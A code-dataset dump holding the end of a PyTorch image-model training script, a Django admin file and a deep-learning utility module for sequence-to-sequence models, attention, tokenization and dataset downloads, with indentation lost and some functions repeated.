writer.add_scalar('Valid/Accuracy', epoch_acc, epoch)
writer.flush()
# deep copy the model
if phase == 'valid' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
print()
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
print('Best val Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model
model_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,
num_epochs=10)
# Save the entire model
print("\nSaving the model...")
torch.save(model_ft, saving_path['SpinalNet_ResNet'])
|
15,146 | a4fdb3c5a3f9aec5d8956862dc01bd170ca6823b | from django.contrib import admin
from .models import Bucketlist, Item
class BucketlistAdmin(admin.ModelAdmin):
pass
admin.site.register(Bucketlist, BucketlistAdmin)
class ItemAdmin(admin.ModelAdmin):
pass
admin.site.register(Item, ItemAdmin)
|
15,147 | c767bfa22d100e4e5054519bbcef220d010726b4 | import matplotlib.pyplot as plt
from IPython import display
from torch.utils import data
import torch
import os
import hashlib
import requests
import collections
import re
import random
import numpy as np
import torch.nn as nn
import time
import math
from torch.nn import functional as F
import zipfile
def use_svg_display():
"""Use the svg format to display a plot in Jupyter."""
display.set_matplotlib_formats('svg')
def set_figsize(figsize=(3.5, 2.5)):
"""Set the figure size for matplotlib."""
use_svg_display()
plt.rcParams['figure.figsize'] = figsize
# Defined in file: ./chapter_preliminaries/calculus.md
def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
"""Set the axes for matplotlib."""
axes.set_xlabel(xlabel)
axes.set_ylabel(ylabel)
axes.set_xscale(xscale)
axes.set_yscale(yscale)
axes.set_xlim(xlim)
axes.set_ylim(ylim)
if legend:
axes.legend(legend)
axes.grid()
def plot(X, Y=None, xlabel=None, ylabel=None, legend=None, xlim=None,
ylim=None, xscale='linear', yscale='linear',
fmts=('-', 'm--', 'g-.', 'r:'), figsize=(3.5, 2.5), axes=None):
"""Plot data points."""
if legend is None:
legend = []
set_figsize(figsize)
axes = axes if axes else plt.gca()
# Return True if `X` (tensor or list) has 1 axis
def has_one_axis(X):
return (hasattr(X, "ndim") and X.ndim == 1 or
isinstance(X, list) and not hasattr(X[0], "__len__"))
if has_one_axis(X):
X = [X]
if Y is None:
X, Y = [[]] * len(X), X
elif has_one_axis(Y):
Y = [Y]
if len(X) != len(Y):
X = X * len(Y)
axes.cla()
for x, y, fmt in zip(X, Y, fmts):
if len(x):
axes.plot(x, y, fmt)
else:
axes.plot(y, fmt)
set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
def show_heatmaps(matrices, xlabel, ylabel, titles=None, figsize=(2.5, 2.5),
cmap='Reds'):
use_svg_display()
num_rows, num_cols = matrices.shape[0], matrices.shape[1]
fig, axes = plt.subplots(num_rows, num_cols, figsize=figsize,
sharex=True, sharey=True, squeeze=False)
for i, (row_axes, row_matrices) in enumerate(zip(axes, matrices)):
for j, (ax, matrix) in enumerate(zip(row_axes, row_matrices)):
pcm = ax.imshow(torch.tensor(matrix), cmap=cmap)
if i == num_rows - 1:
ax.set_xlabel(xlabel)
if j == 0:
ax.set_ylabel(ylabel)
if titles:
ax.set_title(titles[j])
fig.colorbar(pcm, ax=axes, shrink=0.6)
class Animator: #@save
"""For plotting data in animation."""
def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
ylim=None, xscale='linear', yscale='linear',
fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
figsize=(3.5, 2.5)):
# Incrementally plot multiple lines
if legend is None:
legend = []
use_svg_display()
self.fig, self.axes = plt.subplots(nrows, ncols, figsize=figsize)
if nrows * ncols == 1:
self.axes = [self.axes, ]
# Use a lambda function to capture arguments
self.config_axes = lambda: set_axes(
self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
self.X, self.Y, self.fmts = None, None, fmts
def add(self, x, y):
# Add multiple data points into the figure
if not hasattr(y, "__len__"):
y = [y]
n = len(y)
if not hasattr(x, "__len__"):
x = [x] * n
if not self.X:
self.X = [[] for _ in range(n)]
if not self.Y:
self.Y = [[] for _ in range(n)]
for i, (a, b) in enumerate(zip(x, y)):
if a is not None and b is not None:
self.X[i].append(a)
self.Y[i].append(b)
self.axes[0].cla()
for x, y, fmt in zip(self.X, self.Y, self.fmts):
self.axes[0].plot(x, y, fmt)
self.config_axes()
display.display(self.fig)
display.clear_output(wait=True)
def sequence_mask(X, valid_len, value=0):
"""Mask irrelevant entries in sequences."""
maxlen = X.size(1)
mask = torch.arange((maxlen), dtype=torch.float32,
device=X.device)[None, :] < valid_len[:, None]
X[~mask] = value
return X
def read_data_nmt():
"""Load the English-French dataset."""
data_dir = download_extract('fra-eng')
with open(os.path.join(data_dir, 'fra.txt'), 'r') as f:
return f.read()
def preprocess_nmt(text):
"""Preprocess the English-French dataset."""
def no_space(char, prev_char):
return char in set(',.!?') and prev_char != ' '
# Replace non-breaking space with space, and convert uppercase letters to
# lowercase ones
text = text.replace('\u202f', ' ').replace('\xa0', ' ').lower()
# Insert space between words and punctuation marks
out = [' ' + char if i > 0 and no_space(char, text[i - 1]) else char
for i, char in enumerate(text)]
return ''.join(out)
def tokenize_nmt(text, num_examples=None):
"""Tokenize the English-French dataset."""
source, target = [], []
for i, line in enumerate(text.split('\n')):
if num_examples and i > num_examples:
break
parts = line.split('\t')
if len(parts) == 2:
source.append(parts[0].split(' '))
target.append(parts[1].split(' '))
return source, target
def truncate_pad(line, num_steps, padding_token):
"""Truncate or pad sequences."""
if len(line) > num_steps:
return line[:num_steps] # Truncate
return line + [padding_token] * (num_steps - len(line)) # Pad
def build_array_nmt(lines, vocab, num_steps):
"""Transform text sequences of machine translation into minibatches."""
lines = [vocab[l] for l in lines]
lines = [l + [vocab['<eos>']] for l in lines]
array = torch.tensor([truncate_pad(l, num_steps, vocab['<pad>']) for l in lines])
valid_len = torch.sum(torch.as_tensor(array != vocab['<pad>'], dtype=torch.int32),1)
return array, valid_len
def load_data_nmt(batch_size, num_steps, num_examples=600):
"""Return the iterator and the vocabularies of the translation dataset."""
text = preprocess_nmt(read_data_nmt())
source, target = tokenize_nmt(text, num_examples)
src_vocab = Vocab(source, min_freq=2,
reserved_tokens=['<pad>', '<bos>', '<eos>'])
tgt_vocab = Vocab(target, min_freq=2, reserved_tokens=['<pad>', '<bos>', '<eos>'])
src_array, src_valid_len = build_array_nmt(source, src_vocab, num_steps)
tgt_array, tgt_valid_len = build_array_nmt(target, tgt_vocab, num_steps)
data_arrays = (src_array, src_valid_len, tgt_array, tgt_valid_len)
data_iter = load_array(data_arrays, batch_size)
return data_iter, src_vocab, tgt_vocab
class Encoder(nn.Module):
"""The base encoder interface for the encoder-decoder architecture."""
def __init__(self, **kwargs):
super(Encoder, self).__init__(**kwargs)
def forward(self, X, *args):
raise NotImplementedError
class Decoder(nn.Module):
"""The base decoder interface for the encoder-decoder architecture."""
def __init__(self, **kwargs):
super(Decoder, self).__init__(**kwargs)
def init_state(self, enc_outputs, *args):
raise NotImplementedError
def forward(self, X, state):
raise NotImplementedError
class EncoderDecoder(nn.Module):
"""The base class for the encoder-decoder architecture."""
def __init__(self, encoder, decoder, **kwargs):
super(EncoderDecoder, self).__init__(**kwargs)
self.encoder = encoder
self.decoder = decoder
def forward(self, enc_X, dec_X, *args):
enc_outputs = self.encoder(enc_X, *args)
dec_state = self.decoder.init_state(enc_outputs, *args)
return self.decoder(dec_X, dec_state)
class Seq2SeqEncoder(Encoder):
"""The RNN encoder for sequence to sequence learning."""
def __init__(self, vocab_size, embed_size, num_hiddens, num_layers,
dropout=0, **kwargs):
super(Seq2SeqEncoder, self).__init__(**kwargs)
# Embedding layer
self.embedding = nn.Embedding(vocab_size, embed_size)
self.rnn = nn.GRU(embed_size, num_hiddens, num_layers,
dropout=dropout)
def forward(self, X, *args):
# The output `X` shape: (`batch_size`, `num_steps`, `embed_size`)
X = self.embedding(X)
# In RNN models, the first axis corresponds to time steps
X = X.permute(1, 0, 2)
# When state is not mentioned, it defaults to zeros
output, state = self.rnn(X)
# `output` shape: (`num_steps`, `batch_size`, `num_hiddens`)
# `state` shape: (`num_layers`, `batch_size`, `num_hiddens`)
return output, state
def masked_softmax(X, valid_lens):
"""Perform softmax operation by masking elements on the last axis."""
# `X`: 3D tensor, `valid_lens`: 1D or 2D tensor
if valid_lens is None:
return nn.functional.softmax(X, dim=-1)
else:
shape = X.shape
if valid_lens.dim() == 1:
valid_lens = torch.repeat_interleave(valid_lens, shape[1])
else:
valid_lens = valid_lens.reshape(-1)
# On the last axis, replace masked elements with a very large negative
# value, whose exponentiation outputs 0
X = sequence_mask(X.reshape(-1, shape[-1]), valid_lens,
value=-1e6)
return nn.functional.softmax(X.reshape(shape), dim=-1)
class AdditiveAttention(nn.Module):
def __init__(self, key_size, query_size, num_hiddens, dropout, **kwargs):
super(AdditiveAttention, self).__init__(**kwargs)
self.W_k = nn.Linear(key_size, num_hiddens, bias=False)
self.W_q = nn.Linear(query_size, num_hiddens, bias=False)
self.w_v = nn.Linear(num_hiddens, 1, bias=False)
self.dropout = nn.Dropout(dropout)
def forward(self, queries, keys, values, valid_lens):
queries, keys = self.W_q(queries), self.W_k(keys)
# After dimension expansion, shape of `queries`: (`batch_size`, no. of
# queries, 1, `num_hiddens`) and shape of `keys`: (`batch_size`, 1,
# no. of key-value pairs, `num_hiddens`). Sum them up with
# broadcasting
features = queries.unsqueeze(2) + keys.unsqueeze(1)
features = torch.tanh(features)
# There is only one output of `self.w_v`, so we remove the last
# one-dimensional entry from the shape. Shape of `scores`:
# (`batch_size`, no. of queries, no. of key-value pairs)
scores = self.w_v(features).squeeze(-1)
self.attention_weights = masked_softmax(scores, valid_lens)
# Shape of `values`: (`batch_size`, no. of key-value pairs, value
# dimension)
return torch.bmm(self.dropout(self.attention_weights), values)
def use_svg_display():
"""Use the svg format to display a plot in Jupyter."""
display.set_matplotlib_formats('svg')
def set_figsize(figsize=(3.5, 2.5)):
"""Set the figure size for matplotlib."""
use_svg_display()
plt.rcParams['figure.figsize'] = figsize
def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
"""Set the axes for matplotlib."""
axes.set_xlabel(xlabel)
axes.set_ylabel(ylabel)
axes.set_xscale(xscale)
axes.set_yscale(yscale)
axes.set_xlim(xlim)
axes.set_ylim(ylim)
if legend:
axes.legend(legend)
axes.grid()
def plot(X, Y=None, xlabel=None, ylabel=None, legend=None, xlim=None,
ylim=None, xscale='linear', yscale='linear',
fmts=('-', 'm--', 'g-.', 'r:'), figsize=(3.5, 2.5), axes=None):
"""Plot data points."""
if legend is None:
legend = []
set_figsize(figsize)
axes = axes if axes else plt.gca()
# Return True if `X` (tensor or list) has 1 axis
def has_one_axis(X):
return (hasattr(X, "ndim") and X.ndim == 1 or
isinstance(X, list) and not hasattr(X[0], "__len__"))
if has_one_axis(X):
X = [X]
if Y is None:
X, Y = [[]] * len(X), X
elif has_one_axis(Y):
Y = [Y]
if len(X) != len(Y):
X = X * len(Y)
axes.cla()
for x, y, fmt in zip(X, Y, fmts):
if len(x):
axes.plot(x, y, fmt)
else:
axes.plot(y, fmt)
set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
def load_array(data_arrays, batch_size, is_train=True):
"""Construct a PyTorch data iterator."""
dataset = data.TensorDataset(*data_arrays)
return data.DataLoader(dataset, batch_size, shuffle=is_train)
class Accumulator:
"""For accumulating sums over `n` variables."""
def __init__(self, n):
self.data = [0.0] * n
def add(self, *args):
self.data = [a + float(b) for a, b in zip(self.data, args)]
def reset(self):
self.data = [0.0] * len(self.data)
def __getitem__(self, idx):
return self.data[idx]
def evaluate_loss(net, data_iter, loss):
"""Evaluate the loss of a model on the given dataset."""
metric = Accumulator(2) # Sum of losses, no. of examples
for X, y in data_iter:
out = net(X)
y = torch.reshape(y, out.shape)
l = loss(out, y)
metric.add(torch.sum(l), l.numel())
return metric[0] / metric[1]
class Timer:
"""Record multiple running times."""
def __init__(self):
self.times = []
self.start()
def start(self):
"""Start the timer."""
self.tik = time.time()
def stop(self):
"""Stop the timer and record the time in a list."""
self.times.append(time.time() - self.tik)
return self.times[-1]
def avg(self):
"""Return the average time."""
return sum(self.times) / len(self.times)
def sum(self):
"""Return the sum of time."""
return sum(self.times)
def cumsum(self):
"""Return the accumulated time."""
return np.array(self.times).cumsum().tolist()
def truncate_pad(line, num_steps, padding_token):
"""Truncate or pad sequences."""
if len(line) > num_steps:
return line[:num_steps] # Truncate
return line + [padding_token] * (num_steps - len(line)) # Pad
def train_seq2seq(net, data_iter, lr, num_epochs, tgt_vocab, device):
"""Train a model for sequence to sequence."""
def xavier_init_weights(m):
if type(m) == nn.Linear:
nn.init.xavier_uniform_(m.weight)
if type(m) == nn.GRU:
for param in m._flat_weights_names:
if "weight" in param:
nn.init.xavier_uniform_(m._parameters[param])
net.apply(xavier_init_weights)
net.to(device)
optimizer = torch.optim.Adam(net.parameters(), lr=lr)
loss = MaskedSoftmaxCELoss()
net.train()
animator = Animator(xlabel='epoch', ylabel='loss',
xlim=[10, num_epochs])
for epoch in range(num_epochs):
timer = Timer()
metric = Accumulator(2) # Sum of training loss, no. of tokens
for batch in data_iter:
optimizer.zero_grad()
X, X_valid_len, Y, Y_valid_len = [x.to(device) for x in batch]
bos = torch.tensor([tgt_vocab['<bos>']] * Y.shape[0],
device=device).reshape(-1, 1)
dec_input = torch.cat([bos, Y[:, :-1]], 1) # Teacher forcing
Y_hat, _ = net(X, dec_input, X_valid_len)
l = loss(Y_hat, Y, Y_valid_len)
l.sum().backward() # Make the loss scalar for `backward`
grad_clipping(net, 1)
num_tokens = Y_valid_len.sum()
optimizer.step()
with torch.no_grad():
metric.add(l.sum(), num_tokens)
if (epoch + 1) % 10 == 0:
animator.add(epoch + 1, (metric[0] / metric[1],))
print(f'loss {metric[0] / metric[1]:.3f}, {metric[1] / timer.stop():.1f}' f'tokens/sec on {str(device)}')
def predict_seq2seq(net, src_sentence, src_vocab, tgt_vocab, num_steps,
device, save_attention_weights=False):
"""Predict for sequence to sequence."""
# Set `net` to eval mode for inference
net.eval()
src_tokens = src_vocab[src_sentence.lower().split(' ')] + [
src_vocab['<eos>']]
enc_valid_len = torch.tensor([len(src_tokens)], device=device)
src_tokens = truncate_pad(src_tokens, num_steps, src_vocab['<pad>'])
# Add the batch axis
enc_X = torch.unsqueeze(
torch.tensor(src_tokens, dtype=torch.long, device=device), dim=0)
enc_outputs = net.encoder(enc_X, enc_valid_len)
dec_state = net.decoder.init_state(enc_outputs, enc_valid_len)
# Add the batch axis
dec_X = torch.unsqueeze(
torch.tensor([tgt_vocab['<bos>']], dtype=torch.long, device=device),
dim=0)
output_seq, attention_weight_seq = [], []
for _ in range(num_steps):
Y, dec_state = net.decoder(dec_X, dec_state)
# We use the token with the highest prediction likelihood as the input
# of the decoder at the next time step
dec_X = Y.argmax(dim=2)
pred = dec_X.squeeze(dim=0).type(torch.int32).item()
# Save attention weights (to be covered later)
if save_attention_weights:
attention_weight_seq.append(net.decoder.attention_weights)
# Once the end-of-sequence token is predicted, the generation of the
# output sequence is complete
if pred == tgt_vocab['<eos>']:
break
output_seq.append(pred)
return ' '.join(tgt_vocab.to_tokens(output_seq)), attention_weight_seq
class DotProductAttention(nn.Module):
"""Scaled dot product attention."""
def __init__(self, dropout, **kwargs):
super(DotProductAttention, self).__init__(**kwargs)
self.dropout = nn.Dropout(dropout)
# Shape of `queries`: (`batch_size`, no. of queries, `d`)
# Shape of `keys`: (`batch_size`, no. of key-value pairs, `d`)
# Shape of `values`: (`batch_size`, no. of key-value pairs, value
# dimension)
# Shape of `valid_lens`: (`batch_size`,) or (`batch_size`, no. of queries)
def forward(self, queries, keys, values, valid_lens=None):
d = queries.shape[-1]
# Set `transpose_b=True` to swap the last two dimensions of `keys`
scores = torch.bmm(queries, keys.transpose(1,2)) / math.sqrt(d)
self.attention_weights = masked_softmax(scores, valid_lens)
return torch.bmm(self.dropout(self.attention_weights), values)
class MultiHeadAttention(nn.Module):
def __init__(self, key_size, query_size, value_size, num_hiddens,
num_heads, dropout, bias=False, **kwargs):
super(MultiHeadAttention, self).__init__(**kwargs)
self.num_heads = num_heads
self.attention = DotProductAttention(dropout)
self.W_q = nn.Linear(query_size, num_hiddens, bias=bias)
self.W_k = nn.Linear(key_size, num_hiddens, bias=bias)
self.W_v = nn.Linear(value_size, num_hiddens, bias=bias)
self.W_o = nn.Linear(num_hiddens, num_hiddens, bias=bias)
def forward(self, queries, keys, values, valid_lens):
# Shape of `queries`, `keys`, or `values`:
# (`batch_size`, no. of queries or key-value pairs, `num_hiddens`)
# Shape of `valid_lens`:
# (`batch_size`,) or (`batch_size`, no. of queries)
# After transposing, shape of output `queries`, `keys`, or `values`:
# (`batch_size` * `num_heads`, no. of queries or key-value pairs,
# `num_hiddens` / `num_heads`)
queries = transpose_qkv(self.W_q(queries), self.num_heads)
keys = transpose_qkv(self.W_k(keys), self.num_heads)
values = transpose_qkv(self.W_v(values), self.num_heads)
if valid_lens is not None:
# On axis 0, copy the first item (scalar or vector) for
# `num_heads` times, then copy the next item, and so on
valid_lens = torch.repeat_interleave(valid_lens, repeats=self.num_heads, dim=0)
# Shape of `output`: (`batch_size` * `num_heads`, no. of queries,
# `num_hiddens` / `num_heads`)
output = self.attention(queries, keys, values, valid_lens)
# Shape of `output_concat`:
# (`batch_size`, no. of queries, `num_hiddens`)
output_concat = transpose_output(output, self.num_heads)
return self.W_o(output_concat)
def transpose_qkv(X, num_heads):
# Shape of input `X`:
# (`batch_size`, no. of queries or key-value pairs, `num_hiddens`).
# Shape of output `X`:
# (`batch_size`, no. of queries or key-value pairs, `num_heads`,
# `num_hiddens` / `num_heads`)
X = X.reshape(X.shape[0], X.shape[1], num_heads, -1)
# Shape of output `X`:
# (`batch_size`, `num_heads`, no. of queries or key-value pairs,
# `num_hiddens` / `num_heads`)
X = X.permute(0, 2, 1, 3)
# Shape of `output`:
# (`batch_size` * `num_heads`, no. of queries or key-value pairs,
# `num_hiddens` / `num_heads`)
return X.reshape(-1, X.shape[2], X.shape[3])
def transpose_output(X, num_heads):
"""Reverse the operation of `transpose_qkv`"""
X = X.reshape(-1, num_heads, X.shape[1], X.shape[2])
X = X.permute(0, 2, 1, 3)
return X.reshape(X.shape[0], X.shape[1], -1)
class PositionalEncoding(nn.Module):
def __init__(self, num_hiddens, dropout, max_len=1000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(dropout)
# Create a long enough `P`
self.P = torch.zeros((1, max_len, num_hiddens))
X = torch.arange(max_len, dtype=torch.float32).reshape(
-1, 1) / torch.pow(10000, torch.arange(
0, num_hiddens, 2, dtype=torch.float32) / num_hiddens)
self.P[:, :, 0::2] = torch.sin(X)
self.P[:, :, 1::2] = torch.cos(X)
def forward(self, X):
X = X + self.P[:, :X.shape[1], :].to(X.device)
return self.dropout(X)
class AttentionDecoder(Decoder):
"""The base attention-based decoder interface."""
def __init__(self, **kwargs):
super(AttentionDecoder, self).__init__(**kwargs)
@property
def attention_weights(self):
raise NotImplementedError
class MaskedSoftmaxCELoss(nn.CrossEntropyLoss):
"""The softmax cross-entropy loss with masks."""
# `pred` shape: (`batch_size`, `num_steps`, `vocab_size`)
# `label` shape: (`batch_size`, `num_steps`)
# `valid_len` shape: (`batch_size`,)
def forward(self, pred, label, valid_len):
weights = torch.ones_like(label)
weights = sequence_mask(weights, valid_len)
self.reduction='none'
unweighted_loss = super(MaskedSoftmaxCELoss, self).forward(
pred.permute(0, 2, 1), label)
weighted_loss = (unweighted_loss * weights).mean(dim=1)
return weighted_loss
def grad_clipping(net, theta):
"""Clip the gradient."""
if isinstance(net, nn.Module):
params = [p for p in net.parameters() if p.requires_grad]
else:
params = net.params
norm = torch.sqrt(sum(torch.sum((p.grad ** 2)) for p in params))
if norm > theta:
for param in params:
param.grad[:] *= theta / norm
def train_seq2seq(net, data_iter, lr, num_epochs, tgt_vocab, device):
"""Train a model for sequence to sequence."""
def xavier_init_weights(m):
if type(m) == nn.Linear:
nn.init.xavier_uniform_(m.weight)
if type(m) == nn.GRU:
for param in m._flat_weights_names:
if "weight" in param:
nn.init.xavier_uniform_(m._parameters[param])
net.apply(xavier_init_weights)
net.to(device)
optimizer = torch.optim.Adam(net.parameters(), lr=lr)
loss = MaskedSoftmaxCELoss()
net.train()
animator = Animator(xlabel='epoch', ylabel='loss',
xlim=[10, num_epochs])
for epoch in range(num_epochs):
timer = Timer()
metric = Accumulator(2) # Sum of training loss, no. of tokens
for batch in data_iter:
optimizer.zero_grad()
X, X_valid_len, Y, Y_valid_len = [x.to(device) for x in batch]
bos = torch.tensor([tgt_vocab['<bos>']] * Y.shape[0],
device=device).reshape(-1, 1)
dec_input = torch.cat([bos, Y[:, :-1]], 1) # Teacher forcing
Y_hat, _ = net(X, dec_input, X_valid_len)
l = loss(Y_hat, Y, Y_valid_len)
l.sum().backward() # Make the loss scalar for `backward`
grad_clipping(net, 1)
num_tokens = Y_valid_len.sum()
optimizer.step()
with torch.no_grad():
metric.add(l.sum(), num_tokens)
if (epoch + 1) % 10 == 0:
animator.add(epoch + 1, (metric[0] / metric[1],))
print(f'loss {metric[0] / metric[1]:.3f}, {metric[1] / timer.stop():.1f}' f'tokens/sec on {str(device)}')
def try_gpu(i=0):
"""Return gpu(i) if exists, otherwise return cpu()."""
if torch.cuda.device_count() >= i + 1:
return torch.device(f'cuda:{i}')
return torch.device('cpu')
DATA_HUB = dict()
DATA_URL = 'http://d2l-data.s3-accelerate.amazonaws.com/'
DATA_HUB['time_machine'] = (DATA_URL + 'timemachine.txt','090b5e7e70c295757f55df93cb0a180b9691891a')
DATA_HUB['fra-eng'] = (DATA_URL + 'fra-eng.zip','94646ad1522d915e7b0f9296181140edcf86a4f5')
DATA_HUB['airfoil'] = (DATA_URL + 'airfoil_self_noise.dat','76e5be1548fd8222e5074cf0faae75edff8cf93f')
def download(name, cache_dir=os.path.join('..', 'data')):
"""Download a file inserted into DATA_HUB, return the local filename."""
assert name in DATA_HUB, f"{name} does not exist in {DATA_HUB}."
url, sha1_hash = DATA_HUB[name]
os.makedirs(cache_dir, exist_ok=True)
fname = os.path.join(cache_dir, url.split('/')[-1])
if os.path.exists(fname):
sha1 = hashlib.sha1()
with open(fname, 'rb') as f:
while True:
data = f.read(1048576)
if not data:
break
sha1.update(data)
if sha1.hexdigest() == sha1_hash:
return fname # Hit cache
print(f'Downloading {fname} from {url}...')
r = requests.get(url, stream=True, verify=True)
with open(fname, 'wb') as f:
f.write(r.content)
return fname
def download_extract(name, folder=None):
"""Download and extract a zip/tar file."""
fname = download(name)
base_dir = os.path.dirname(fname)
data_dir, ext = os.path.splitext(fname)
if ext == '.zip':
fp = zipfile.ZipFile(fname, 'r')
elif ext in ('.tar', '.gz'):
fp = tarfile.open(fname, 'r')
else:
assert False, 'Only zip/tar files can be extracted.'
fp.extractall(base_dir)
return os.path.join(base_dir, folder) if folder else data_dir
class Vocab:
"""Vocabulary for text."""
def __init__(self, tokens=None, min_freq=0, reserved_tokens=None):
if tokens is None:
tokens = []
if reserved_tokens is None:
reserved_tokens = []
# Sort according to frequencies
counter = count_corpus(tokens)
self.token_freqs = sorted(counter.items(), key=lambda x: x[1],
reverse=True)
# The index for the unknown token is 0
self.unk, uniq_tokens = 0, ['<unk>'] + reserved_tokens
uniq_tokens += [token for token, freq in self.token_freqs
if freq >= min_freq and token not in uniq_tokens]
self.idx_to_token, self.token_to_idx = [], dict()
for token in uniq_tokens:
self.idx_to_token.append(token)
self.token_to_idx[token] = len(self.idx_to_token) - 1
def __len__(self):
return len(self.idx_to_token)
def __getitem__(self, tokens):
if not isinstance(tokens, (list, tuple)):
return self.token_to_idx.get(tokens, self.unk)
return [self.__getitem__(token) for token in tokens]
def to_tokens(self, indices):
if not isinstance(indices, (list, tuple)):
return self.idx_to_token[indices]
return [self.idx_to_token[index] for index in indices]
def count_corpus(tokens):
"""Count token frequencies."""
# Here `tokens` is a 1D list or 2D list
if len(tokens) == 0 or isinstance(tokens[0], list):
# Flatten a list of token lists into a list of tokens
tokens = [token for line in tokens for token in line]
return collections.Counter(tokens)
def load_corpus_time_machine(max_tokens=-1):
"""Return token indices and the vocabulary of the time machine dataset."""
lines = read_time_machine()
tokens = tokenize(lines, 'char')
vocab = Vocab(tokens)
# Since each text line in the time machine dataset is not necessarily a
# sentence or a paragraph, flatten all the text lines into a single list
corpus = [vocab[token] for line in tokens for token in line]
if max_tokens > 0:
corpus = corpus[:max_tokens]
return corpus, vocab
def tokenize(lines, token='word'):
"""Split text lines into word or character tokens."""
if token == 'word':
return [line.split() for line in lines]
elif token == 'char':
return [list(line) for line in lines]
else:
print('ERROR: unknown token type: ' + token)
def read_time_machine():
"""Load the time machine dataset into a list of text lines."""
with open(download('time_machine'), 'r') as f:
lines = f.readlines()
return [re.sub('[^A-Za-z]+', ' ', line).strip().lower() for line in lines]
def seq_data_iter_random(corpus, batch_size, num_steps): #@save
"""Generate a minibatch of subsequences using random sampling."""
# Start with a random offset (inclusive of `num_steps - 1`) to partition a
# sequence
corpus = corpus[random.randint(0, num_steps - 1):]
# Subtract 1 since we need to account for labels
num_subseqs = (len(corpus) - 1) // num_steps
# The starting indices for subsequences of length `num_steps`
initial_indices = list(range(0, num_subseqs * num_steps, num_steps))
# In random sampling, the subsequences from two adjacent random
# minibatches during iteration are not necessarily adjacent on the
# original sequence
random.shuffle(initial_indices)
def data(pos):
# Return a sequence of length `num_steps` starting from `pos`
return corpus[pos: pos + num_steps]
num_batches = num_subseqs // batch_size
for i in range(0, batch_size * num_batches, batch_size):
# Here, `initial_indices` contains randomized starting indices for
# subsequences
initial_indices_per_batch = initial_indices[i: i + batch_size]
X = [data(j) for j in initial_indices_per_batch]
Y = [data(j + 1) for j in initial_indices_per_batch]
yield torch.tensor(X), torch.tensor(Y)
def seq_data_iter_sequential(corpus, batch_size, num_steps):
"""Generate a minibatch of subsequences using sequential partitioning."""
# Start with a random offset to partition a sequence
offset = random.randint(0, num_steps)
num_tokens = ((len(corpus) - offset - 1) // batch_size) * batch_size
Xs = torch.tensor(corpus[offset: offset + num_tokens])
Ys = torch.tensor(corpus[offset + 1: offset + 1 + num_tokens])
Xs, Ys = Xs.reshape(batch_size, -1), Ys.reshape(batch_size, -1)
num_batches = Xs.shape[1] // num_steps
for i in range(0, num_steps * num_batches, num_steps):
X = Xs[:, i: i + num_steps]
Y = Ys[:, i: i + num_steps]
yield X, Y
class SeqDataLoader: #@save
"""An iterator to load sequence data."""
def __init__(self, batch_size, num_steps, use_random_iter, max_tokens):
if use_random_iter:
self.corpus, self.vocab = load_corpus_time_machine(max_tokens)
self.data_iter_fn = seq_data_iter_random
else:
self.data_iter_fn = seq_data_iter_sequential
self.corpus, self.vocab = load_corpus_time_machine(max_tokens)
self.batch_size, self.num_steps = batch_size, num_steps
def __iter__(self):
return self.data_iter_fn(self.corpus, self.batch_size, self.num_steps)
def load_data_time_machine(batch_size, num_steps, use_random_iter=False, max_tokens=10000):
"""Return the iterator and the vocabulary of the time machine dataset."""
data_iter = SeqDataLoader( batch_size, num_steps, use_random_iter, max_tokens)
return data_iter, data_iter.vocab
def bleu(pred_seq, label_seq, k):
"""Compute the BLEU."""
pred_tokens, label_tokens = pred_seq.split(' '), label_seq.split(' ')
len_pred, len_label = len(pred_tokens), len(label_tokens)
score = math.exp(min(0, 1 - len_label / len_pred))
for n in range(1, k + 1):
num_matches, label_subs = 0, collections.defaultdict(int)
for i in range(len_label - n + 1):
label_subs[''.join(label_tokens[i:i + n])] += 1
for i in range(len_pred - n + 1):
if label_subs[''.join(pred_tokens[i:i + n])] > 0:
num_matches += 1
label_subs[''.join(pred_tokens[i:i + n])] -= 1
score *= math.pow(num_matches / (len_pred - n + 1), math.pow(0.5, n))
return score
def train_2d(trainer, steps=20, f_grad=None): #@save
"""Optimize a 2D objective function with a customized trainer."""
# `s1` and `s2` are internal state variables that will be used later
x1, x2, s1, s2 = -5, -2, 0, 0
results = [(x1, x2)]
for i in range(steps):
if f_grad:
x1, x2, s1, s2 = trainer(x1, x2, s1, s2, f_grad)
else:
x1, x2, s1, s2 = trainer(x1, x2, s1, s2)
results.append((x1, x2))
print(f'epoch {i + 1}, x1: {float(x1):f}, x2: {float(x2):f}')
return results
def show_trace_2d(f, results): #@save
"""Show the trace of 2D variables during optimization."""
set_figsize()
plt.plot(*zip(*results), '-o', color='#ff7f0e')
x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))
plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')
plt.xlabel('x1')
def linreg(X, w, b):
"""The linear regression model."""
return torch.matmul(X, w) + b
def squared_loss(y_hat, y):
"""Squared loss."""
return (y_hat - torch.reshape(y, y_hat.shape))**2 / 2
def evaluate_loss(net, data_iter, loss):
"""Evaluate the loss of a model on the given dataset."""
metric = Accumulator(2) # Sum of losses, no. of examples
for X, y in data_iter:
out = net(X)
y = torch.reshape(y, out.shape)
l = loss(out, y)
metric.add(torch.sum(l), l.numel())
return metric[0] / metric[1]
def get_data(batch_size=10, n=1500):
data = np.genfromtxt(download('airfoil'),
dtype=np.float32, delimiter='\t')
data = torch.from_numpy((data - data.mean(axis=0)) / data.std(axis=0))
data_iter = load_array((data[:n, :-1], data[:n, -1]),
batch_size, is_train=True)
return data_iter, data.shape[1]-1
# %%
def sgd(params, states, hyperparams):
for p in params:
p.data.sub_(hyperparams['lr'] * p.grad)
p.grad.data.zero_()
# %%
def train_ch11(trainer_fn, states, hyperparams, data_iter,
feature_dim, num_epochs=2):
# Initialization
